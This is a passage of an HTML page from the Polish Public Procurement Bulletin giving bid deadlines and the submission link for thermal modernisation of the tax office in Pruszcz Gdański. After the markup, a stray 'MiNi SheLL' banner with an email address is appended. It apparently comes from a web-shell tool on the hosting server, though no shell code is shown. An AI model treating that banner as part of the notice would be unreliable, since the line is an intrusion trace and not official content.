innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ias-gdansk.eb2b.com.pl/organizer-previewauction. html/244582/termomodernizacja-budynku-urzedu-skarbowego-w-pruszczu-gdanskim</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-06</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-16 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com